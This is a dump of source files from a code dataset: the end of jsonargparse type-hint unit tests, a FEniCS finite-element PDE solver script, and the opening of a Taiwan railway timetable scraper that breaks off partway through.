\"jsonargparse0.IncorrectModule\"}]'])\n with self.assertRaises(ParserError):\n parser.parse_args(['--op=[1]'])\n\n init_args = '\"init_args\": {\"bad_arg\": True}'\n with self.assertRaises(ParserError):\n parser.parse_args(['--op=[{'+class_path+', '+init_args+'}]'])\n\n init_args = '\"init_args\": {\"firstweekday\": 3}'\n cfg = parser.parse_args(['--op=[{'+class_path+', '+init_args+'}]'])\n self.assertEqual(cfg['op'][0]['init_args'].as_dict(), {'firstweekday': 3})\n cfg = parser.instantiate_classes(cfg)\n self.assertIsInstance(cfg['op'][0], Calendar)\n self.assertEqual(3, cfg['op'][0].firstweekday)\n\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('--n.op', type=Optional[Calendar])\n cfg = parser.parse_args(['--n.op={'+class_path+', '+init_args+'}'])\n cfg = parser.instantiate_classes(cfg)\n self.assertIsInstance(cfg['n']['op'], Calendar)\n self.assertEqual(3, cfg['n']['op'].firstweekday)\n\n parser = ArgumentParser()\n parser.add_argument('--op', type=Calendar)\n cfg = parser.parse_args(['--op={'+class_path+', '+init_args+'}'])\n cfg = parser.instantiate_classes(cfg)\n self.assertIsInstance(cfg['op'], Calendar)\n self.assertEqual(3, cfg['op'].firstweekday)\n\n cfg = parser.instantiate_classes(parser.parse_args([]))\n self.assertIsNone(cfg['op'])\n\n\n def test_class_type_without_defaults(self):\n class MyCal(Calendar):\n def __init__(self, p1: int = 1, p2: str = '2'):\n pass\n\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('--op', type=MyCal)\n\n with mock_module(MyCal) as module:\n cfg = parser.parse_args([f'--op.class_path={module}.MyCal', '--op.init_args.p1=3'], defaults=False)\n self.assertEqual(cfg.op, Namespace(class_path=f'{module}.MyCal', init_args=Namespace(p1=3)))\n cfg = parser.parse_args(['--op.class_path', f'{module}.MyCal', '--op.init_args.p1', '3'], defaults=False)\n self.assertEqual(cfg.op, Namespace(class_path=f'{module}.MyCal', init_args=Namespace(p1=3)))\n\n\n def test_class_type_required_params(self):\n class MyCal(Calendar):\n def __init__(self, p1: int, p2: str):\n pass\n\n with mock_module(MyCal) as module:\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('--op', type=MyCal, default=lazy_instance(MyCal))\n\n cfg = parser.get_defaults()\n self.assertEqual(cfg.op.class_path, f'{module}.MyCal')\n self.assertEqual(cfg.op.init_args, Namespace(p1=None, p2=None))\n self.assertRaises(ParserError, lambda: parser.parse_args([f'--op={module}.MyCal']))\n\n\n def test_class_type_subclass_given_by_name_issue_84(self):\n class LocalCalendar(Calendar):\n pass\n\n parser = ArgumentParser()\n parser.add_argument('--op', type=Union[Calendar, GzipFile, None])\n cfg = parser.parse_args(['--op=TextCalendar'])\n self.assertEqual(cfg.op.class_path, 'calendar.TextCalendar')\n\n out = StringIO()\n parser.print_help(out)\n for class_path in ['calendar.Calendar', 'calendar.TextCalendar', 'gzip.GzipFile']:\n self.assertIn(class_path, out.getvalue())\n self.assertNotIn('LocalCalendar', out.getvalue())\n\n class HTMLCalendar(Calendar):\n pass\n\n with mock_module(HTMLCalendar) as module:\n err = StringIO()\n with redirect_stderr(err), self.assertRaises(SystemExit):\n parser.parse_args(['--op.help=HTMLCalendar'])\n self.assertIn('Give the full class path to avoid ambiguity', err.getvalue())\n self.assertIn(f'{module}.HTMLCalendar', err.getvalue())\n\n\n def test_class_type_subclass_short_init_args(self):\n parser = ArgumentParser()\n parser.add_argument('--op', type=Calendar)\n cfg = parser.parse_args(['--op=TextCalendar', '--op.firstweekday=2'])\n self.assertEqual(cfg.op.class_path, 'calendar.TextCalendar')\n self.assertEqual(cfg.op.init_args, Namespace(firstweekday=2))\n\n\n def test_class_type_invalid_class_name_then_init_args(self):\n parser = ArgumentParser()\n parser.add_argument('--cal', type=Calendar)\n err = StringIO()\n with redirect_stderr(err), self.assertRaises(SystemExit):\n parser.parse_args(['--cal=NotCalendarSubclass', '--cal.firstweekday=2'])\n #self.assertIn('NotCalendarSubclass', err.getvalue()) # Need new way to show NotCalendarSubclass\n\n\n def test_class_type_config_merge_init_args(self):\n class MyCal(Calendar):\n def __init__(self, param_a: int = 1, param_b: str = 'x', **kwargs):\n super().__init__(**kwargs)\n\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('--cfg', action=ActionConfigFile)\n parser.add_argument('--cal', type=Calendar)\n\n with mock_module(MyCal) as module:\n config1 = {\n 'cal': {\n 'class_path': f'{module}.MyCal',\n 'init_args': {\n 'firstweekday': 2,\n 'param_b': 'y',\n }\n }\n }\n config2 = deepcopy(config1)\n config2['cal']['init_args'] = {\n 'param_a': 2,\n 'firstweekday': 3,\n }\n expected = deepcopy(config1['cal'])\n expected['init_args'].update(config2['cal']['init_args'])\n\n cfg = parser.parse_args([f'--cfg={yaml.safe_dump(config1)}', f'--cfg={yaml.safe_dump(config2)}'])\n self.assertEqual(cfg.cal.as_dict(), expected)\n\n\n def test_init_args_without_class_path(self):\n parser = ArgumentParser()\n parser.add_argument('--config', action=ActionConfigFile)\n parser.add_argument('--cal', type=Calendar)\n\n config = \"\"\"cal:\n class_path: TextCalendar\n init_args:\n firstweekday: 2\n \"\"\"\n cal = \"\"\"init_args:\n firstweekday: 3\n \"\"\"\n\n cfg = parser.parse_args([f'--config={config}', f'--cal={cal}'])\n self.assertEqual(cfg.cal.init_args, Namespace(firstweekday=3))\n\n cfg = parser.parse_args([f'--config={config}', f'--cal={cfg.cal.init_args.as_dict()}'])\n self.assertEqual(cfg.cal.init_args, Namespace(firstweekday=3))\n\n\n def test_class_type_subclass_nested_init_args(self):\n class Class:\n def __init__(self, cal: Calendar, p1: int = 0):\n self.cal = cal\n\n for full in ['init_args.', '']:\n with self.subTest('full' if full else 'short'), mock_module(Class) as module:\n parser = ArgumentParser()\n parser.add_argument('--op', type=Class)\n cfg = parser.parse_args([\n f'--op={module}.Class',\n f'--op.{full}p1=1',\n f'--op.{full}cal=calendar.TextCalendar',\n f'--op.{full}cal.{full}firstweekday=2',\n ])\n self.assertEqual(cfg.op.class_path, f'{module}.Class')\n self.assertEqual(cfg.op.init_args.p1, 1)\n self.assertEqual(cfg.op.init_args.cal.class_path, 'calendar.TextCalendar')\n self.assertEqual(cfg.op.init_args.cal.init_args, Namespace(firstweekday=2))\n\n\n def test_class_type_dict_default_nested_init_args(self):\n class Data:\n def __init__(self, p1: int = 1, p2: str = 'x', p3: bool = False):\n pass\n\n with mock_module(Data) as module:\n parser = ArgumentParser()\n parser.add_argument('--data', type=Data)\n parser.set_defaults({'data': {'class_path': f'{module}.Data'}})\n cfg = parser.parse_args([\n f'--data.init_args.p1=2',\n f'--data.init_args.p2=y',\n f'--data.init_args.p3=true',\n ])\n self.assertEqual(cfg.data.init_args, Namespace(p1=2, p2='y', p3=True))\n\n\n def test_class_type_subclass_nested_help(self):\n class Class:\n def __init__(self, cal: Calendar, p1: int = 0):\n self.cal = cal\n\n parser = ArgumentParser()\n parser.add_argument('--op', type=Class)\n\n for pattern in [r'[\\s=]', r'\\s']:\n with self.subTest('\" \"' if '=' in pattern else '\"=\"'), mock_module(Class) as module:\n out = StringIO()\n args = re.split(pattern, f'--op.help={module}.Class --op.init_args.cal.help=TextCalendar')\n with redirect_stdout(out), self.assertRaises(SystemExit):\n parser.parse_args(args)\n self.assertIn('--op.init_args.cal.init_args.firstweekday', out.getvalue())\n\n with self.subTest('invalid'), mock_module(Class) as module:\n err = StringIO()\n with redirect_stderr(err), self.assertRaises(SystemExit):\n parser.parse_args([f'--op.help={module}.Class', '--op.init_args.p1=1'])\n self.assertIn('Expected a nested --*.help option', err.getvalue())\n\n\n def test_class_type_unresolved_parameters(self):\n class Class:\n def __init__(self, p1: int = 1, p2: str = '2', **kwargs):\n self.kwargs = kwargs\n\n with mock_module(Class) as module:\n config = f\"\"\"cls:\n class_path: {module}.Class\n init_args:\n p1: 5\n dict_kwargs:\n p2: '6'\n p3: 7.0\n p4: x\n \"\"\"\n expected = Namespace(\n class_path=f'{module}.Class',\n init_args=Namespace(p1=5, p2='6'),\n dict_kwargs={'p3': 7.0, 'p4': 'x'},\n )\n\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('--config', action=ActionConfigFile)\n parser.add_argument('--cls', type=Class)\n\n cfg = parser.parse_args([f'--config={config}'])\n self.assertEqual(cfg.cls, expected)\n cfg_init = parser.instantiate_classes(cfg)\n self.assertIsInstance(cfg_init.cls, Class)\n self.assertEqual(cfg_init.cls.kwargs, expected.dict_kwargs)\n\n cfg = parser.parse_args(['--cls=Class', '--cls.dict_kwargs.p4=x', '--cls.dict_kwargs.p3=7.0'])\n self.assertEqual(cfg.cls.dict_kwargs, expected.dict_kwargs)\n\n with self.assertRaises(ParserError):\n parser.parse_args(['--cls=Class', '--cls.dict_kwargs=1'])\n\n out = StringIO()\n with redirect_stdout(out), self.assertRaises(SystemExit):\n parser.parse_args([f'--config={config}', '--print_config'])\n data = yaml.safe_load(out.getvalue())['cls']\n self.assertEqual(data, expected.as_dict())\n\n\n def test_class_type_unresolved_name_clash(self):\n class Class:\n def __init__(self, dict_kwargs: int = 1, **kwargs):\n self.kwargs = kwargs\n\n with mock_module(Class) as module:\n parser = ArgumentParser()\n parser.add_argument('--cls', type=Class)\n args = [f'--cls={module}.Class', '--cls.dict_kwargs=2']\n cfg = parser.parse_args(args)\n self.assertEqual(cfg.cls.init_args.as_dict(), {'dict_kwargs': 2})\n args.append('--cls.dict_kwargs.p1=3')\n cfg = parser.parse_args(args)\n self.assertEqual(cfg.cls.init_args.as_dict(), {'dict_kwargs': 2})\n self.assertEqual(cfg.cls.dict_kwargs, {'p1': 3})\n\n\n def test_invalid_init_args_in_yaml(self):\n config = \"\"\"cal:\n class_path: calendar.Calendar\n init_args:\n \"\"\"\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('--config', action=ActionConfigFile)\n parser.add_argument('--cal', type=Calendar)\n self.assertRaises(ParserError, lambda: parser.parse_args([f'--config={config}']))\n\n\n def test_typehint_serialize_list(self):\n parser = ArgumentParser()\n action = parser.add_argument('--list', type=Union[PositiveInt, List[PositiveInt]])\n self.assertEqual([1, 2], action.serialize([PositiveInt(1), PositiveInt(2)]))\n self.assertRaises(ValueError, lambda: action.serialize([1, -2]))\n\n\n def test_typehint_serialize_enum(self):\n\n class MyEnum(Enum):\n a = 1\n b = 2\n\n parser = ArgumentParser()\n action = parser.add_argument('--enum', type=Optional[MyEnum])\n self.assertEqual('b', action.serialize(MyEnum.b))\n self.assertRaises(ValueError, lambda: action.serialize('x'))\n\n\n def test_unsupported_type(self):\n self.assertRaises(ValueError, lambda: ActionTypeHint(typehint=lambda: None))\n self.assertRaises(ValueError, lambda: ActionTypeHint(typehint=Union[int, lambda: None]))\n\n\n def test_nargs_questionmark(self):\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('p1')\n parser.add_argument('p2', nargs='?', type=OpenUnitInterval)\n self.assertIsNone(parser.parse_args(['a']).p2)\n self.assertEqual(0.5, parser.parse_args(['a', '0.5']).p2)\n self.assertRaises(ParserError, lambda: parser.parse_args(['a', 'b']))\n\n\n def test_register_type(self):\n\n def serializer(v):\n return v.isoformat()\n\n def deserializer(v):\n return datetime.strptime(v, '%Y-%m-%dT%H:%M:%S')\n\n register_type(datetime, serializer, deserializer)\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('--datetime', type=datetime)\n cfg = parser.parse_args(['--datetime=2008-09-03T20:56:35'])\n self.assertEqual(cfg.datetime, datetime(2008, 9, 3, 20, 56, 35))\n self.assertEqual(parser.dump(cfg), \"datetime: '2008-09-03T20:56:35'\\n\")\n self.assertRaises(ValueError, lambda: register_type(datetime))\n register_type(uuid.UUID)\n\n\n def test_lazy_instance_invalid_kwargs(self):\n class MyClass:\n def __init__(self, param: int = 1):\n pass\n\n self.assertRaises(ValueError, lambda: lazy_instance(MyClass, param='bad'))\n\n\n def test_dump_skip_default(self):\n class MyCalendar(Calendar):\n def __init__(self, *args, param: str = '0', **kwargs):\n super().__init__(*args, **kwargs)\n\n with mock_module(MyCalendar) as module:\n parser = ArgumentParser()\n parser.add_argument('--g1.op1', default=1)\n parser.add_argument('--g1.op2', default='abc')\n parser.add_argument('--g2.op1', type=Callable, default=deepcopy)\n parser.add_argument('--g2.op2', type=Calendar, default=lazy_instance(Calendar, firstweekday=2))\n\n cfg = parser.get_defaults()\n dump = parser.dump(cfg, skip_default=True)\n self.assertEqual(dump, '{}\\n')\n\n cfg.g2.op2.class_path = f'{module}.MyCalendar'\n dump = parser.dump(cfg, skip_default=True)\n self.assertEqual(dump, f'g2:\\n op2:\\n class_path: {module}.MyCalendar\\n init_args:\\n firstweekday: 2\\n')\n\n cfg.g2.op2.init_args.firstweekday = 0\n dump = parser.dump(cfg, skip_default=True)\n self.assertEqual(dump, f'g2:\\n op2:\\n class_path: {module}.MyCalendar\\n')\n\n parser.link_arguments('g1.op1', 'g2.op2.init_args.firstweekday')\n parser.link_arguments('g1.op2', 'g2.op2.init_args.param')\n del cfg['g2.op2.init_args']\n dump = parser.dump(cfg, skip_default=True)\n self.assertEqual(dump, f'g2:\\n op2:\\n class_path: {module}.MyCalendar\\n')\n\n\nclass TypeHintsTmpdirTests(TempDirTestCase):\n\n def test_path(self):\n os.mkdir(os.path.join(self.tmpdir, 'example'))\n rel_yaml_file = os.path.join('..', 'example', 'example.yaml')\n abs_yaml_file = os.path.realpath(os.path.join(self.tmpdir, 'example', rel_yaml_file))\n with open(abs_yaml_file, 'w') as output_file:\n output_file.write('file: '+rel_yaml_file+'\\ndir: '+self.tmpdir+'\\n')\n\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('--cfg', action=ActionConfigFile)\n parser.add_argument('--file', type=Path_fr)\n parser.add_argument('--dir', type=Path_drw)\n parser.add_argument('--files', nargs='+', type=Path_fr)\n\n cfg = parser.parse_args(['--cfg', abs_yaml_file])\n self.assertEqual(self.tmpdir, os.path.realpath(cfg.dir()))\n self.assertEqual(rel_yaml_file, str(cfg.file))\n self.assertEqual(abs_yaml_file, os.path.realpath(cfg.file()))\n\n cfg = parser.parse_args(['--cfg', 'file: '+abs_yaml_file+'\\ndir: '+self.tmpdir+'\\n'])\n self.assertEqual(self.tmpdir, os.path.realpath(cfg.dir()))\n self.assertEqual(abs_yaml_file, os.path.realpath(cfg.file()))\n\n cfg = parser.parse_args(['--file', abs_yaml_file, '--dir', self.tmpdir])\n self.assertEqual(self.tmpdir, os.path.realpath(cfg.dir()))\n self.assertEqual(abs_yaml_file, os.path.realpath(cfg.file()))\n self.assertRaises(ParserError, lambda: parser.parse_args(['--dir', abs_yaml_file]))\n self.assertRaises(ParserError, lambda: parser.parse_args(['--file', self.tmpdir]))\n\n cfg = parser.parse_args(['--files', abs_yaml_file, abs_yaml_file])\n self.assertTrue(isinstance(cfg.files, list))\n self.assertEqual(2, len(cfg.files))\n self.assertEqual(abs_yaml_file, os.path.realpath(cfg.files[-1]()))\n\n\n def test_list_path(self):\n parser = ArgumentParser()\n parser.add_argument('--paths', type=List[Path_fc])\n cfg = parser.parse_args(['--paths=[\"file1\", \"file2\"]'])\n self.assertEqual(['file1', 'file2'], cfg.paths)\n self.assertIsInstance(cfg.paths[0], Path)\n self.assertIsInstance(cfg.paths[1], Path)\n\n\n def test_optional_path(self):\n pathlib.Path('file_fr').touch()\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('--path', type=Optional[Path_fr])\n self.assertIsNone(parser.parse_args(['--path=null']).path)\n cfg = parser.parse_args(['--path=file_fr'])\n self.assertEqual('file_fr', cfg.path)\n self.assertIsInstance(cfg.path, Path)\n self.assertRaises(ParserError, lambda: parser.parse_args(['--path=not_exist']))\n\n\n def test_enable_path(self):\n data = {'a': 1, 'b': 2, 'c': [3, 4]}\n cal = {'class_path': 'calendar.Calendar'}\n with open('data.yaml', 'w') as f:\n json.dump(data, f)\n with open('cal.yaml', 'w') as f:\n json.dump(cal, f)\n\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('--data', type=Dict[str, Any], enable_path=True)\n parser.add_argument('--cal', type=Calendar, enable_path=True)\n cfg = parser.parse_args(['--data=data.yaml'])\n self.assertEqual('data.yaml', str(cfg['data'].pop('__path__')))\n self.assertEqual(data, cfg['data'])\n cfg = parser.instantiate_classes(parser.parse_args(['--cal=cal.yaml']))\n self.assertIsInstance(cfg['cal'], Calendar)\n self.assertRaises(ParserError, lambda: parser.parse_args(['--data=does-not-exist.yaml']))\n\n\n def test_default_path_unregistered_type(self):\n parser = ArgumentParser()\n parser.add_argument('--path',\n type=path_type('drw', skip_check=True),\n default=Path('test', mode='drw', skip_check=True))\n cfg = parser.parse_args([])\n self.assertEqual('path: test\\n', parser.dump(cfg))\n out = StringIO()\n parser.print_help(out)\n self.assertIn('(type: Path_drw_skip_check, default: test)', out.getvalue())\n\n\n def test_class_type_with_default_config_files(self):\n config = {\n 'class_path': 'calendar.Calendar',\n 'init_args': {'firstweekday': 3},\n }\n config_path = os.path.join(self.tmpdir, 'config.yaml')\n with open(config_path, 'w') as f:\n json.dump({'data': {'cal': config}}, f)\n\n class MyClass:\n def __init__(self, cal: Optional[Calendar] = None, val: int = 2):\n self.cal = cal\n\n parser = ArgumentParser(error_handler=None, default_config_files=[config_path])\n parser.add_argument('--op', default='from default')\n parser.add_class_arguments(MyClass, 'data')\n\n cfg = parser.get_defaults()\n self.assertEqual(config_path, str(cfg['__default_config__']))\n self.assertEqual(cfg.data.cal.as_dict(), config)\n dump = parser.dump(cfg)\n self.assertIn('class_path: calendar.Calendar\\n', dump)\n self.assertIn('firstweekday: 3\\n', dump)\n\n cfg = parser.parse_args([])\n self.assertEqual(cfg.data.cal.as_dict(), config)\n cfg = parser.parse_args(['--data.cal.class_path=calendar.Calendar'], defaults=False)\n self.assertEqual(cfg.data.cal, Namespace(class_path='calendar.Calendar'))\n\n\n def test_class_path_override_with_default_config_files(self):\n\n class MyCalendar(Calendar):\n def __init__(self, *args, param: str = '0', **kwargs):\n super().__init__(*args, **kwargs)\n\n with mock_module(MyCalendar) as module:\n config = {\n 'class_path': f'{module}.MyCalendar',\n 'init_args': {'firstweekday': 2, 'param': '1'},\n }\n config_path = os.path.join(self.tmpdir, 'config.yaml')\n with open(config_path, 'w') as f:\n json.dump({'cal': config}, f)\n\n parser = ArgumentParser(error_handler=None, default_config_files=[config_path])\n parser.add_argument('--cal', type=Optional[Calendar])\n\n cfg = parser.instantiate_classes(parser.get_defaults())\n self.assertIsInstance(cfg['cal'], MyCalendar)\n\n with warnings.catch_warnings(record=True) as w:\n cfg = parser.parse_args(['--cal={\"class_path\": \"calendar.Calendar\", \"init_args\": {\"firstweekday\": 3}}'])\n self.assertIn(\"discarding init_args: {'param': '1'}\", str(w[0].message))\n self.assertEqual(cfg.cal.init_args, Namespace(firstweekday=3))\n self.assertEqual(type(parser.instantiate_classes(cfg)['cal']), Calendar)\n\n\n def test_mapping_class_typehint(self):\n class A:\n pass\n\n class B:\n def __init__(\n self,\n class_map: Mapping[str, A],\n int_list: List[int],\n ):\n self.class_map = class_map\n self.int_list = int_list\n\n with mock_module(A, B) as module:\n parser = ArgumentParser(error_handler=None)\n parser.add_class_arguments(B, 'b')\n\n config = {\n 'b': {\n 'class_map': {\n 'one': {'class_path': f'{module}.A'},\n },\n 'int_list': [1],\n },\n }\n\n cfg = parser.parse_object(config)\n self.assertEqual(cfg.b.class_map, {'one': Namespace(class_path=f'{module}.A')})\n self.assertEqual(cfg.b.int_list, [1])\n\n cfg_init = parser.instantiate_classes(cfg)\n self.assertIsInstance(cfg_init.b, B)\n self.assertIsInstance(cfg_init.b.class_map, dict)\n self.assertIsInstance(cfg_init.b.class_map['one'], A)\n\n config['b']['int_list'] = config['b']['class_map']\n self.assertRaises(ParserError, lambda: parser.parse_object(config))\n\n\n def test_subcommand_with_subclass_default_override_lightning_issue_10859(self):\n\n class Arch:\n def __init__(self, a: int = 1):\n pass\n\n class ArchB(Arch):\n def __init__(self, a: int = 2, b: int = 3):\n pass\n\n class ArchC(Arch):\n def __init__(self, a: int = 4, c: int = 5):\n pass\n\n parser = ArgumentParser(error_handler=None)\n parser_subcommands = parser.add_subcommands()\n subparser = ArgumentParser()\n subparser.add_argument('--arch', type=Arch)\n\n with mock_module(Arch, ArchB, ArchC) as module:\n default = {'class_path': f'{module}.ArchB'}\n value = {'class_path': f'{module}.ArchC', 'init_args': {'a': 10, 'c': 11}}\n\n subparser.set_defaults(arch=default)\n parser_subcommands.add_subcommand('fit', subparser)\n\n with warnings.catch_warnings(record=True) as w:\n cfg = parser.parse_args(['fit', f'--arch={json.dumps(value)}'])\n self.assertIn(\"discarding init_args: {'b': 3}\", str(w[0].message))\n self.assertEqual(cfg.fit.arch.as_dict(), value)\n\n\nclass OtherTests(unittest.TestCase):\n\n def test_is_optional(self):\n class MyEnum(Enum):\n A = 1\n\n params = [\n (Optional[bool], bool, True),\n (Union[type(None), bool], bool, True),\n (Dict[bool, type(None)], bool, False),\n (Optional[Path_fr], Path, True),\n (Union[type(None), Path_fr], Path, True),\n (Dict[Path_fr, type(None)], Path, False),\n (Optional[MyEnum], Enum, True),\n (Union[type(None), MyEnum], Enum, True),\n (Dict[MyEnum, type(None)], Enum, False),\n ]\n\n for typehint, ref_type, expected in params:\n with self.subTest(str(typehint)):\n self.assertEqual(expected, is_optional(typehint, ref_type))\n\n\nif __name__ == '__main__':\n unittest.main(verbosity=2)\n","sub_path":"jsonargparse_tests/test_typehints.py","file_name":"test_typehints.py","file_ext":"py","file_size_in_byte":48718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"124832999","text":"from mshr import *\nfrom dolfin import *\n\nimport sys\nimport numpy as np\nfrom scipy import interpolate\nfrom matplotlib import pyplot as plt\n\nimport time\nimport csv\nimport png\nfrom PIL import Image\n#set_log_level(ERROR)\nset_log_level(40)\n\n\nimport gc\n\n############################################## \n# Partial Differential Equation: #\n# #\n# { div( a * grad(u) ) = f on Interior #\n# { u = 0 on Boundary #\n# #\n##############################################\n\n# Solves PDE defined above using the Finite Element Method; retrieves the\n# mesh and coefficient data from the files generated by 'mesh.py' and 'data.py'\n#def FEM_solver(resolution, mesh_resolution, mesh_directory, data_directory, solution_directory, mesh_ID, stiffness_ID, source_ID):\ndef FEM_solver(resolution, mesh_resolution, mesh_ID, data_ID, use_hires=False):\n #set_log_level(ERROR)\n set_log_level(40)\n # Identifying label for saving files\n #ID_label = str(mesh_ID) + '_' + str(data_ID)\n ID_label = str(data_ID)\n \n # Specifiy file containing mesh\n mesh_filename = './Meshes/mesh_' + str(mesh_ID) + '.xml'\n\n # Recover mesh from file\n mesh = Mesh(mesh_filename)\n V = FunctionSpace(mesh, 'Lagrange', 1)\n\n # Create square mesh\n square_mesh = UnitSquareMesh(resolution-1,resolution-1)\n square_V = FunctionSpace(square_mesh, 'CG', 1)\n\n # Specify files containing stiffness/source function data\n #stiffness_function_filename = stiff_dir + 'stiff_function_' + str(stiff_ID) + '.xml'\n data_function_filename = './Data/data_' + str(data_ID) + '.xml'\n coeff_function_filename = './Data/coeff_' + str(data_ID) + '.xml'\n \n \n solution_function_filename = './Solutions/solution_' + ID_label + '.xml'\n solution_filename = './Solutions/solution_' + ID_label + '.npy'\n hires_solution_filename = './Solutions/hires_solution_' + ID_label + '.npy'\n\n # Recover mesh from file\n #mesh = Mesh(mesh_filename)\n #V = FunctionSpace(mesh, 'Lagrange', 1)\n\n # Define mesh on unit square\n \"\"\"\n square_domain = Rectangle(Point(-1.0,-1.0),Point(1.0,1.0))\n square_mesh = generate_mesh(square_domain,mesh_resolution)\n square_V = FunctionSpace(square_mesh, 'Lagrange', 1)\n \"\"\"\n #square_mesh = UnitSquareMesh(resolution-1,resolution-1)\n #square_V = FunctionSpace(square_mesh, 'CG', 1)\n\n\n # Project stiffness term onto mesh\n a_function = Function(square_V, coeff_function_filename)\n a = project(a_function, V)\n\n # Use constant stiffness term\n #a = Constant('1.0')\n\n # Project source term onto mesh\n f_function = Function(square_V, data_function_filename)\n f = project(f_function, V)\n\n \n # Define boundary conditions\n u0 = Constant(0.0)\n def u0_boundary(x, on_boundary):\n return on_boundary\n bc = DirichletBC(V, u0, u0_boundary)\n\n # Define variational problem\n u = TrialFunction(V)\n v = TestFunction(V)\n \n #\n # Used to Interpolate New Data\n #\n \n #ti = np.linspace(-1.0, 1.0,resolution)\n #x = ti\n #y = ti\n #z = np.random.uniform(0.0,10.0,(resolution,resolution))\n #approximate = interpolate.RectBivariateSpline(x,y,z)\n #print('Interpolation Completed')\n #mesh_points = mesh.coordinates()\n #print(mesh_points)\n\n #a = Function(V)\n #a_vector = a.vector()\n #a_array = np.array(a_vector.array())\n #vals_shape = a_array.shape\n #vals_size = a_array.size\n\n #vals = np.zeros((vals_size,))\n #for k in range(0,vals_size):\n # vals[k] = approximate.ev(mesh_points[k][0], mesh_points[k][1])\n\n #print(vals)\n\n #vals = np.random.uniform(0.0,1.0,vals_shape)\n #a.vector().set_local(np.array(vals))\n\n\n # Identity matrix for diagonal stiffness term\n I_mat = Expression((('1.0','0.0'),\n ('0.0','1.0')), degree=2)\n\n #g = Expression('1.0', degree=0)\n # Weak Formulation Integrand\n #A = inner(a*I_mat*nabla_grad(u), nabla_grad(v))*dx\n A = inner(a*I_mat*nabla_grad(u), nabla_grad(v))*dx\n L = f*v*dx\n\n # Compute Solution\n u = Function(V)\n solve(A == L, u, bc)\n\n\n # Compute min/max of solution\n #u_array = u.vector().array()\n #u_max = u_array.max()\n #u_min = u_array.min()\n\n # Save solution as Fenics Function\n #File(solution_function_filename) << u\n \n # Compute Norms\n #L2norm = norm(u, 'L2', mesh)\n #H1norm = norm(u, 'H1', mesh)\n\n\n\n step = 1.0/resolution\n start = 0.0 + step/2.0\n \n \n vals = np.zeros([resolution,resolution])\n for i in range(0,resolution):\n for j in range(0,resolution):\n x_coord = start + i*step\n y_coord = start + (resolution - 1 - j)*step\n pt = Point(x_coord, y_coord)\n cell_id = mesh.bounding_box_tree().compute_first_entity_collision(pt)\n #if mesh.bounding_box_tree().collides(pt):\n if cell_id < mesh.num_cells():\n try:\n # Interior points can be evaluated directly\n vals[j,i] = u(pt)\n except:\n # Points near the boundary have issues due to rounding...\n cell = Cell(mesh, cell_id)\n coords = cell.get_vertex_coordinates()\n new_x_coord = coords[0]\n new_y_coord = coords[1]\n new_pt = Point(new_x_coord, new_y_coord)\n vals[j,i] = u(new_pt)\n \n np.save(solution_filename, vals)\n\n\n\n if use_hires:\n ## Save hi-res solution array\n new_resolution = 2*resolution\n new_step = 1.0/new_resolution\n new_start = 0.0 + new_step/2.0\n\n\n new_vals = np.zeros([new_resolution,new_resolution])\n for i in range(0,new_resolution):\n for j in range(0,new_resolution):\n x_coord = new_start + i*new_step\n y_coord = new_start + (new_resolution - 1 - j)*new_step\n pt = Point(x_coord, y_coord)\n cell_id = mesh.bounding_box_tree().compute_first_entity_collision(pt)\n #if mesh.bounding_box_tree().collides(pt):\n if cell_id < mesh.num_cells():\n try:\n # Interior points can be evaluated directly\n new_vals[j,i] = u(pt)\n except:\n # Points near the boundary have issues due to rounding...\n cell = Cell(mesh, cell_id)\n coords = cell.get_vertex_coordinates()\n new_x_coord = coords[0]\n new_y_coord = coords[1]\n new_pt = Point(new_x_coord, new_y_coord)\n new_vals[j,i] = u(new_pt)\n\n np.save(hires_solution_filename, new_vals)\n\n\n \n # Cleanup to avoid continual memory increase\n #del_list = [mesh, V, square_mesh, square_V, f, f_function, u, vals, new_vals]\n #del del_list\n #gc.collect()\n \n\n\ndef gen_soln(current_data, total_count, resolution, mesh_resolution, use_hires=False):\n #set_log_level(ERROR)\n set_log_level(40)\n time_step = 1\n step = 0\n #progress = ' [ Estimated Time ~ N/A ]'\n #start_time = time.clock()\n #count = 1\n #total_count = current_mesh*current_data\n #total_count = current_data\n\n \n for i in range(0,1):\n for j in range(current_data, current_data + total_count):\n step += 1\n #sys.stdout.flush()\n FEM_solver(resolution, mesh_resolution, j, j, use_hires=use_hires)\n #gc.collect()\n #count +=1\n #print('\\n\\n')\n\n \n","sub_path":"Variable_Coefficient/Setup/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":7679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"290767560","text":"#臺灣鐵路班次爬蟲\r\nimport requests\r\nimport json\r\nfrom bs4 import BeautifulSoup\r\n\r\n\r\nclass train():\r\n\r\n train_url = 'http://twtraffic.tra.gov.tw/twrail/TW_Quicksearch.aspx'\r\n\r\n def __init__(self, input_str):\r\n self.input_str = []\r\n self.input_str.append(''.join(input_str[0].replace(\"台\", \"臺\")))\r\n self.input_str.append(''.join(input_str[1].replace(\"台\", \"臺\")))\r\n self.input_str.append(input_str[2])\r\n print(\"self.input_str length:\" + str(len(self.input_str)))\r\n print(\"train input:\" + str(self.input_str))\r\n\r\n def get_train_number(self):\r\n myheaders = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36\"}\r\n try:\r\n resp = requests.get(self.train_url, headers=myheaders)\r\n resp.encoding = 'utf-8'\r\n soup = BeautifulSoup(resp.text, 'html.parser')\r\n except BaseException as e:\r\n print(\"Exception at train get, \" + str(e))\r\n return ''\r\n\r\n station_values = []\r\n for value in soup.find_all('input', attrs={'name': 'FromStationName'}):\r\n station_values.append(value['value'])\r\n\r\n station_names = []\r\n for name in soup.find_all('label', class_='stationradiolabel'):\r\n station_names.append(name.text.replace(' ', ''))\r\n\r\n str_from_station_name = ''\r\n str_to_station_name = ''\r\n for i, value in enumerate(station_values):\r\n if 